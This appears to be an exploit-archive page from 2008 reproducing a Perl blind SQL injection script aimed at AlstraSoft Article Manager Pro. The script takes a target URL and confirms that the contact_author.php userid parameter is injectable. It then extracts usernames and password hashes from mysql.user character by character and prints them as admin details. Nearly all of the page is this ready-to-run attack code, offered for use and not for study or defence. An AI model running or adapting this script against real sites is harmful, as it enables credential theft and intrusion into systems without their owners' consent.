Home / exploitsPDF  

alstrasoftarticle-sql.txt

Posted on 18 July 2008

#/usr/bin/perl
#|+| Author: GoLd_M
#--//-->
# -- AlstraSoft Article Manager Pro  Blind SQL Injection Exploit --
#--//--> Exploit :
use strict;
use LWP::Simple;

print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-
";
print "-    AlstraSoft Article Manager Pro  Blind SQL Injection Exploit   -
";
print "                     GoLd_M Mahmood_ali Tryag.cc/cc                 
";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
";

print "
Enter URL (ie: http://server.com): ";
chomp(my $url=<STDIN>);

if(inject_test($url)) {
print "Injecting.. Please Wait this could take several minutes..

";
my $details = blind($url);
print "Exploit Success! Admin Details: ".$details;
exit;
}

sub blind {

my $url    = shift;
my $res    = undef;
my $chr    = 48;
my $substr = 1;
my $done   = 1;

while($done) {
my $content = get($url."/contact_author.php?userid=1)  and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM
mysql.user),".$substr.",1))=".$chr."/*");

if($content =~ /Previous/ && $chr == 94) { $done = 0; }
elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
return $res;
}

sub inject_test {

my $url     = shift;
my $true    = get($url."/contact_author.php?userid=1) and 1=1 /*");
my $false   = get($url."/contact_author.php?userid=1) and 1=2 /*");

if($true =~ /Previous/ && $false !~ /Previous/) {
print "
Target Site Vulnerable!

";
return 1;
} else { print "
Target Site Not Vulnerable! Exiting..
"; exit; }
}

 

TOP

Malware :

Exploits :